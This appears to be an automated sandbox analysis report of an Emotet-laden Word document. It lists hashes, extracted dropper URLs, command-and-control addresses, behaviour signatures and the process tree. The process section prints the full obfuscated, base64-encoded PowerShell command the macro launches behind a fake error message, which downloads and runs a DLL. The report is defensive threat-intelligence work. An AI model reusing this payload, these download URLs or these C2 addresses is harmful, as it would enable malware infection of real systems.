Analysis

  • max time kernel
    144s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    11-02-2021 19:41

General

  • Target

    1d5f5373532659a5361731578ae5b4a16fa9559a7f5ccde01d97f3cb992c1264.doc

  • Size

    146KB

  • MD5

    6dc721e4640b69d1803e279948407951

  • SHA1

    a79ba944baad631a8fd81ccb135d4a5a4a437c3b

  • SHA256

    1d5f5373532659a5361731578ae5b4a16fa9559a7f5ccde01d97f3cb992c1264

  • SHA512

    0c2945658582db687b070ccb8008479c9805f26f1aa2e46457d6e415ba3820b7b85c07d19f9bf72904b000a18a3aad6c0ef680ce8c9457a93cdadb00a065266e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gethumvee.com/improvisate/HVTtdmsZ/

exe.dropper

http://arch.nqu.edu.tw/wordpress/w7F/

exe.dropper

http://hindumedia.in/microsporous/P7m/

exe.dropper

http://pageshare.net/sales/tzV/

exe.dropper

http://bgmtechnologies.com/4131325866/sg/

exe.dropper

http://popperandshow.com/248152296/ccXqKYPqQ/

Extracted

Family

emotet

Botnet

Epoch3

C2

132.248.38.158:80

203.157.152.9:7080

157.245.145.87:443

110.37.224.243:80

70.32.89.105:8080

185.142.236.163:443

192.241.220.183:8080

91.83.93.103:443

54.38.143.245:8080

192.210.217.94:8080

37.205.9.252:7080

78.90.78.210:80

182.73.7.59:8080

163.53.204.180:443

91.75.75.46:80

172.104.46.84:8080

161.49.84.2:80

27.78.27.110:443

203.160.167.243:80

109.99.146.210:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1d5f5373532659a5361731578ae5b4a16fa9559a7f5ccde01d97f3cb992c1264.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4688
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAGkAVABlAG0AIAAgAFYAYQByAGkAQQBiAGwAZQA6AGIAVgAxAE8ARwA5ACAAIAAoAFsAVABZAHAARQBdACgAIgB7ADUAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQAiAC0AZgAnAHIAWQAnACwAJwBZAHMAdABFAE0AJwAsACcAbwAnACwAJwAuAGkAJwAsACcALgBEAGkAUgBFAEMAVABPACcALAAnAHMAJwApACkAIAAgADsAIAAgACAAIABzAHYAIAAgACgAIgBGAE8AIgArACIAZwAiACkAIAAgACgAIAAgAFsAVABZAHAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADcAfQB7ADYAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADUAfQAiACAALQBGACcARQAnACwAJwAuAG4AJwAsACcAaQBjAEUAcAAnACwAJwBvAEkATgB0AE0AQQBOAGEAZwAnACwAJwBTAFkAUwB0AEUATQAnACwAJwBSACcALAAnAFYAJwAsACcARQB0AC4AcwBFAHIAJwApACAAKQA7ACAAIAAkAEUAYwB6AHkAOABpAHYAPQAkAEYAMgAwAE4AIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEIAXwA5AE4AOwAkAFAANwAwAFoAPQAoACcAUQAwACcAKwAnADUASAAnACkAOwAgACQAYgB2ADEATwBnADkAOgA6ACIAYwBgAFIARQBhAFQAZQBgAGQAYABJAFIARQBjAGAAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcAQwAnACsAJwBpAHAAOAByACcAKwAnAHAAZgAnACkAKwAnAHsAJwArACcAMAB9AFcAZAB1AHkANgBtADIAewAwACcAKwAnAH0AJwApACAALQBGACAAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQgA5ADIAVgA9ACgAJwBMADcAJwArACcAXwBVACcAKQA7ACAAIAAkAGYATwBnADoAOgAiAHMAZQBDAFUAUgBJAGAAVABgAFkAYABQAFIATwB0AG8AYwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEIAMAA0AFAAPQAoACcAVQAnACsAKAAnADQAMQAnACsAJwBPACcAKQApADsAJABXAG8AaQBvAHAAcgB4ACAAPQAgACgAJwBIADgAJwArACcANQBLACcAKQA7ACQAUAA0ADAATwA9ACgAJwBXADUAJwArACcAMQBPACcAKQA7ACQAQwA2AGEAMwB4AHQAeQA9ACQASABPAE0ARQArACgAKAAnAFMASQAnACsAKAAnADcAQwAnACsAJwBpACcAKwAnAHAAOAByAHAAJwApACsAJwBmACcAKwAnAFMAJwArACgAJwBJADcAJwArACcAVwBkAHUAeQAnACkAKwAnADYAbQAnACsAJwAyACcAKwAoACcAUwBJACcAKwAnADcAJwApACkAIAAtAFIAZQBwAGwAQQBjAEUAIAAgACgAJwBTACcAKwAnAEkANwAnACkALABbAGMAaABhAHIAXQA5ADIAKQArACQAVwBvAGkAbwBwAHIAeAArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQATQAxADEARgA9ACgAJwBNACcAKwAoACcAXwAxACcAKwAnAFgAJwApACkAOwAkAEcAcQB3AHIAYgBtAGwAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABSAHQAdQBxAGMAZAAyAD0AKAAoACcAcwBnACcAKwAnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZwBlAHQAaAB1ACcAKwAnAG0AJwApACsAJwB2ACcAKwAnAGUAZQAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvAG0ALwAnACsAJwBpACcAKQArACgAJwBtAHAAcgBvAHYAJwArACcAaQAnACsAJwBzAGEAdABlACcAKQArACcALwBIACcAKwAnAFYAVAAnACsAJwB0AGQAJwArACcAbQAnACsAJwBzACcAKwAoACcAWgAvACcAKwAnACEAcwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACcAIABhACcAKwAnAGgAOgAnACsAKAAnAC8AJwArACcALwBhAHIAYwAnACkAKwAoACcAaAAuAG4AJwArACcAcQB1ACcAKQArACcALgAnACsAKAAnAGUAZAAnACsAJwB1ACcAKQArACgAJwAuAHQAJwArACcAdwAnACkAKwAoACcALwB3ACcAKwAnAG8AJwApACsAKAAnAHIAJwArACcAZABwAHIAZQBzACcAKQArACgAJwBzACcAKwAnAC8AdwA3ACcAKwAnAEYALwAhACcAKQArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIAAnACsAJwBhAGgAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAKAAnAGgAaQAnACsAJwBuACcAKQArACcAZAB1ACcAKwAoACcAbQBlAGQAaQAnACsAJwBhACcAKQArACgAJwAuAGkAbgAnACsAJwAvACcAKQArACgAJwBtACcAKwAnAGkAYwAnACkAKwAoACcAcgBvAHMAcABvAHIAJwArACcAbwAnACkAKwAnAHUAJwArACgAJwBzAC8AUAA3ACcAKwAnAG0ALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhAGgAOgAnACsAJwAvAC8AJwArACcAcABhAGcAJwArACcAZQAnACkAKwAoACcAcwBoACcAKwAnAGEAJwApACsAKAAnAHIAJwArACcAZQAuAG4AZQB0AC8AJwApACsAKAAnAHMAYQBsACcAKwAnAGUAJwApACsAKAAnAHMALwAnACsAJwB0ACcAKQArACcAegAnACsAKAAnAFYALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACcAeQB3ACcAKwAnACAAYQAnACsAKAAnAGgAOgAvACcAKwAnAC8AYgBnAG0AJwApACsAJwB0ACcAKwAnAGUAYwAnACsAJwBoAG4AJwArACgAJwBvAGwAJwArACcAbwBnAGkAZQBzACcAKwAnAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnADQAJwArACcAMQAzACcAKQArACgAJwAxADMAJwArACcAMgA1ACcAKQArACgAJwA4ADYANgAvAHMAZwAnACsAJwAvACcAKQArACcAIQBzACcAKwAoACcAZwAgAHkAdwAgAGEAJwArACcAaAA6ACcAKwAnAC8AJwApACsAJwAvAHAAJwArACcAbwAnACsAJwBwACcAKwAnAHAAZQAnACsAKAAnAHIAJwArACcAYQBuAGQAJwApACsAKAAnAHMAaABvAHcALgBjACcAKwAnAG8AbQAnACsAJwAvADIANAAnACsAJwA4ACcAKQArACcAMQAnACsAKAAnADUAMgAyADkANgAvACcAKwAnAGMAJwApACsAJwBjACcAKwAnAFgAJwArACgAJwBxAEsAWQBQACcAKwAnAHEAJwApACsAJwBRACcAKwAnAC8AJwApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAcwBnACAAeQAnACsAJwB3ACcAKQArACcAIAAnACsAJwBhAGgAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABHAHEAdwByAGIAbQBsACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAFQAMwAzAE8AIAArACAAJABFAGMAegB5ADgAaQB2ACAAKwAgACQASAA5ADAARgApADsAJABLADQAOABBAD0AKAAnAEQAOAAnACsAJwA1AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABPADcAegBlADkANQB0ACAAaQBuACAAJABSAHQAdQBxAGMAZAAyACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAKQAuACIAZABvAFcAbgBsAE8AYABBAEQARgBpAGAAbABlACIAKAAkAE8ANwB6AGUAOQA1AHQALAAgACQAQwA2AGEAMwB4AHQAeQApADsAJABSADkAOQBPAD0AKAAnAFUAJwArACgAJwA0ACcAKwAnADAAVAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADYAYQAzAHgAdAB5ACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAANAAxADUANAA3ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAJwArACcAMgAnACkAIAAkAEMANgBhADMAeAB0AHkALAAoACgAJwBBACcAKwAnAG4AeQBTAHQAcgBpACcAKQArACcAbgAnACsAJwBnACcAKQAuACIAVABvAHMAVABgAFIASQBgAE4ARwAiACgAKQA7ACQAUQA2ADUAQwA9ACgAJwBDADQAJwArACcAOQBRACcAKQA7AGIAcgBlAGEAawA7ACQATgAwADgAUQA9ACgAJwBJACcAKwAoACcAMQAnACsAJwA2AFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMgAyAEkAPQAoACcATQAnACsAKAAnADgAJwArACcANwBaACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:4240
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABTAGUAVAAtAGkAVABlAG0AIAAgAFYAYQByAGkAQQBiAGwAZQA6AGIAVgAxAE8ARwA5ACAAIAAoAFsAVABZAHAARQBdACgAIgB7ADUAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQAiAC0AZgAnAHIAWQAnACwAJwBZAHMAdABFAE0AJwAsACcAbwAnACwAJwAuAGkAJwAsACcALgBEAGkAUgBFAEMAVABPACcALAAnAHMAJwApACkAIAAgADsAIAAgACAAIABzAHYAIAAgACgAIgBGAE8AIgArACIAZwAiACkAIAAgACgAIAAgAFsAVABZAHAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADcAfQB7ADYAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADUAfQAiACAALQBGACcARQAnACwAJwAuAG4AJwAsACcAaQBjAEUAcAAnACwAJwBvAEkATgB0AE0AQQBOAGEAZwAnACwAJwBTAFkAUwB0AEUATQAnACwAJwBSACcALAAnAFYAJwAsACcARQB0AC4AcwBFAHIAJwApACAAKQA7ACAAIAAkAEUAYwB6AHkAOABpAHYAPQAkAEYAMgAwAE4AIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEIAXwA5AE4AOwAkAFAANwAwAFoAPQAoACcAUQAwACcAKwAnADUASAAnACkAOwAgACQAYgB2ADEATwBnADkAOgA6ACIAYwBgAFIARQBhAFQAZQBgAGQAYABJAFIARQBjAGAAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcAQwAnACsAJwBpAHAAOAByACcAKwAnAHAAZgAnACkAKwAnAHsAJwArACcAMAB9AFcAZAB1AHkANgBtADIAewAwACcAKwAnAH0AJwApACAALQBGACAAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQgA5ADIAVgA9ACgAJwBMADcAJwArACcAXwBVACcAKQA7ACAAIAAkAGYATwBnADoAOgAiAHMAZQBDAFUAUgBJAGAAVABgAFkAYABQAFIATwB0AG8AYwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEIAMAA0AFAAPQAoACcAVQAnACsAKAAnADQAMQAnACsAJwBPACcAKQApADsAJABXAG8AaQBvAHAAcgB4ACAAPQAgACgAJwBIADgAJwArACcANQBLACcAKQA7ACQAUAA0ADAATwA9ACgAJwBXADUAJwArACcAMQBPACcAKQA7ACQAQwA2AGEAMwB4AHQAeQA9ACQASABPAE0ARQArACgAKAAnAFMASQAnACsAKAAnADcAQwAnACsAJwBpACcAKwAnAHAAOAByAHAAJwApACsAJwBmACcAKwAnAFMAJwArACgAJwBJADcAJwArACcAVwBkAHUAeQAnACkAKwAnADYAbQAnACsAJwAyACcAKwAoACcAUwBJACcAKwAnADcAJwApACkAIAAtAFIAZQBwAGwAQQBjAEUAIAAgACgAJwBTACcAKwAnAEkANwAnACkALABbAGMAaABhAHIAXQA5ADIAKQArACQAVwBvAGkAbwBwAHIAeAArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQATQAxADEARgA9ACgAJwBNACcAKwAoACcAXwAxACcAKwAnAFgAJwApACkAOwAkAEcAcQB3AHIAYgBtAGwAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABSAHQAdQBxAGMAZAAyAD0AKAAoACcAcwBnACcAKwAnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZwBlAHQAaAB1ACcAKwAnAG0AJwApACsAJwB2ACcAKwAnAGUAZQAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvAG0ALwAnACsAJwBpACcAKQArACgAJwBtAHAAcgBvAHYAJwArACcAaQAnACsAJwBzAGEAdABlACcAKQArACcALwBIACcAKwAnAFYAVAAnACsAJwB0AGQAJwArACcAbQAnACsAJwBzACcAKwAoACcAWgAvACcAKwAnACEAcwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACcAIABhACcAKwAnAGgAOgAnACsAKAAnAC8AJwArACcALwBhAHIAYwAnACkAKwAoACcAaAAuAG4AJwArACcAcQB1ACcAKQArACcALgAnACsAKAAnAGUAZAAnACsAJwB1ACcAKQArACgAJwAuAHQAJwArACcAdwAnACkAKwAoACcALwB3ACcAKwAnAG8AJwApACsAKAAnAHIAJwArACcAZABwAHIAZQBzACcAKQArACgAJwBzACcAKwAnAC8AdwA3ACcAKwAnAEYALwAhACcAKQArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIAAnACsAJwBhAGgAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAKAAnAGgAaQAnACsAJwBuACcAKQArACcAZAB1ACcAKwAoACcAbQBlAGQAaQAnACsAJwBhACcAKQArACgAJwAuAGkAbgAnACsAJwAvACcAKQArACgAJwBtACcAKwAnAGkAYwAnACkAKwAoACcAcgBvAHMAcABvAHIAJwArACcAbwAnACkAKwAnAHUAJwArACgAJwBzAC8AUAA3ACcAKwAnAG0ALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhAGgAOgAnACsAJwAvAC8AJwArACcAcABhAGcAJwArACcAZQAnACkAKwAoACcAcwBoACcAKwAnAGEAJwApACsAKAAnAHIAJwArACcAZQAuAG4AZQB0AC8AJwApACsAKAAnAHMAYQBsACcAKwAnAGUAJwApACsAKAAnAHMALwAnACsAJwB0ACcAKQArACcAegAnACsAKAAnAFYALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACcAeQB3ACcAKwAnACAAYQAnACsAKAAnAGgAOgAvACcAKwAnAC8AYgBnAG0AJwApACsAJwB0ACcAKwAnAGUAYwAnACsAJwBoAG4AJwArACgAJwBvAGwAJwArACcAbwBnAGkAZQBzACcAKwAnAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnADQAJwArACcAMQAzACcAKQArACgAJwAxADMAJwArACcAMgA1ACcAKQArACgAJwA4ADYANgAvAHMAZwAnACsAJwAvACcAKQArACcAIQBzACcAKwAoACcAZwAgAHkAdwAgAGEAJwArACcAaAA6ACcAKwAnAC8AJwApACsAJwAvAHAAJwArACcAbwAnACsAJwBwACcAKwAnAHAAZQAnACsAKAAnAHIAJwArACcAYQBuAGQAJwApACsAKAAnAHMAaABvAHcALgBjACcAKwAnAG8AbQAnACsAJwAvADIANAAnACsAJwA4ACcAKQArACcAMQAnACsAKAAnADUAMgAyADkANgAvACcAKwAnAGMAJwApACsAJwBjACcAKwAnAFgAJwArACgAJwBxAEsAWQBQACcAKwAnAHEAJwApACsAJwBRACcAKwAnAC8AJwApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAcwBnACAAeQAnACsAJwB3ACcAKQArACcAIAAnACsAJwBhAGgAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABHAHEAdwByAGIAbQBsACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAFQAMwAzAE8AIAArACAAJABFAGMAegB5ADgAaQB2ACAAKwAgACQASAA5ADAARgApADsAJABLADQAOABBAD0AKAAnAEQAOAAnACsAJwA1AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABPADcAegBlADkANQB0ACAAaQBuACAAJABSAHQAdQBxAGMAZAAyACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAKQAuACIAZABvAFcAbgBsAE8AYABBAEQARgBpAGAAbABlACIAKAAkAE8ANwB6AGUAOQA1AHQALAAgACQAQwA2AGEAMwB4AHQAeQApADsAJABSADkAOQBPAD0AKAAnAFUAJwArACgAJwA0ACcAKwAnADAAVAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADYAYQAzAHgAdAB5ACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAANAAxADUANAA3ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAJwArACcAMgAnACkAIAAkAEMANgBhADMAeAB0AHkALAAoACgAJwBBACcAKwAnAG4AeQBTAHQAcgBpACcAKQArACcAbgAnACsAJwBnACcAKQAuACIAVABvAHMAVABgAFIASQBgAE4ARwAiACgAKQA7ACQAUQA2ADUAQwA9ACgAJwBDADQAJwArACcAOQBRACcAKQA7AGIAcgBlAGEAawA7ACQATgAwADgAUQA9ACgAJwBJACcAKwAoACcAMQAnACsAJwA2AFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMgAyAEkAPQAoACcATQAnACsAKAAnADgAJwArACcANwBaACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3220
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cip8rpf\Wduy6m2\H85K.dll,AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cip8rpf\Wduy6m2\H85K.dll,AnyString
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1392
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Cip8rpf\Wduy6m2\H85K.dll",#1
              5⤵
              • Loads dropped DLL
              PID:1912

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Cip8rpf\Wduy6m2\H85K.dll
      MD5

      3e1249e4d0b0b61d493da93139b9f3a4

      SHA1

      82863b73820e293793dc90da9635c390fc928ef7

      SHA256

      03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

      SHA512

      4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

    • \Users\Admin\Cip8rpf\Wduy6m2\H85K.dll
      MD5

      3e1249e4d0b0b61d493da93139b9f3a4

      SHA1

      82863b73820e293793dc90da9635c390fc928ef7

      SHA256

      03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

      SHA512

      4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

    • \Users\Admin\Cip8rpf\Wduy6m2\H85K.dll
      MD5

      3e1249e4d0b0b61d493da93139b9f3a4

      SHA1

      82863b73820e293793dc90da9635c390fc928ef7

      SHA256

      03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

      SHA512

      4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

    • memory/1164-15-0x0000000000000000-mapping.dmp
    • memory/1392-20-0x0000000002E40000-0x0000000002E5F000-memory.dmp
      Filesize

      124KB

    • memory/1392-22-0x0000000010000000-0x0000000010023000-memory.dmp
      Filesize

      140KB

    • memory/1392-17-0x0000000000000000-mapping.dmp
    • memory/1912-19-0x0000000000000000-mapping.dmp
    • memory/3220-12-0x0000012484130000-0x0000012484132000-memory.dmp
      Filesize

      8KB

    • memory/3220-11-0x000001249C540000-0x000001249C541000-memory.dmp
      Filesize

      4KB

    • memory/3220-13-0x0000012484133000-0x0000012484135000-memory.dmp
      Filesize

      8KB

    • memory/3220-14-0x0000012484136000-0x0000012484138000-memory.dmp
      Filesize

      8KB

    • memory/3220-10-0x000001249C390000-0x000001249C391000-memory.dmp
      Filesize

      4KB

    • memory/3220-9-0x00007FFEDDB90000-0x00007FFEDE57C000-memory.dmp
      Filesize

      9.9MB

    • memory/3220-8-0x0000000000000000-mapping.dmp
    • memory/3872-7-0x0000000000000000-mapping.dmp
    • memory/4688-2-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp
      Filesize

      64KB

    • memory/4688-6-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp
      Filesize

      64KB

    • memory/4688-5-0x00007FFEE49A0000-0x00007FFEE4FD7000-memory.dmp
      Filesize

      6.2MB

    • memory/4688-4-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp
      Filesize

      64KB

    • memory/4688-3-0x00007FFEC57A0000-0x00007FFEC57B0000-memory.dmp
      Filesize

      64KB